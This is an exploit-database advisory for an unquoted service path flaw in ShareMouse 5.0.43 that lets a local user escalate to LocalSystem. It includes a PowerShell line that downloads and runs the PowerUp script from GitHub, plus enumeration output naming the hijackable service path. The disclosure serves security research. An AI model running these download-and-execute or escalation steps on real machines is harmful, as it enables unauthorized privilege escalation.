ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path

vendor:

ShareMouse

by:

Alan Lacerda

7.5

CVSS

HIGH

Unquoted Service Path

428

CWE

Product Name: ShareMouse

Affected Version From: 5.0.43

Affected Version To: 5.0.43

Patch Exists: NO

Related CWE:

CPE: a:sharemouse:sharemouse:5.0.43

Metasploit:

Other Scripts:

Platforms Tested: Windows

2020

ShareMouse 5.0.43 – ‘ShareMouse Service’ Unquoted Service Path

The ShareMouse Service in ShareMouse version 5.0.43 has an unquoted service path vulnerability. This vulnerability allows a local user to insert their code in the system root path undetected by the OS or other security applications, where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

Mitigation:

To mitigate this vulnerability, ensure that the service path is quoted correctly in the registry.

Source

Exploit-DB raw data:

# Exploit Title: ShareMouse 5.0.43 - 'ShareMouse Service' Unquoted Service Path
# Discovery Date: 2020-09-08
# Discovery by: Alan Lacerda (alacerda)
# Vendor Homepage: https://www.sharemouse.com/
# Software Link: https://www.sharemouse.com/ShareMouseSetup.exe
# Version: 5.0.43
# Tested on OS: Microsoft Windows 10 Pro EN OS Version: 10.0.19041

PS > iex (iwr https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -UseBasicParsing);
PS > Invoke-AllChecks

ServiceName   : ShareMouse Service
Path          : C:\Program Files (x86)\ShareMouse\smService.exe
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'ShareMouse Service' -Path <HijackPath>

PS >  wmic service where 'name like "%ShareMouse%"' get DisplayName,PathName,AcceptStop,StartName
AcceptStop  DisplayName         PathName                                         StartName
TRUE        ShareMouse Service  C:\Program Files (x86)\ShareMouse\smService.exe  LocalSystem

#Exploit:
# A successful attempt would require the local user to be able to insert their code in the system root path 
# undetected by the OS or other security applications where it could potentially be executed during 
# application startup or reboot. If successful, the local user's code would execute with the elevated 
# privileges of the application.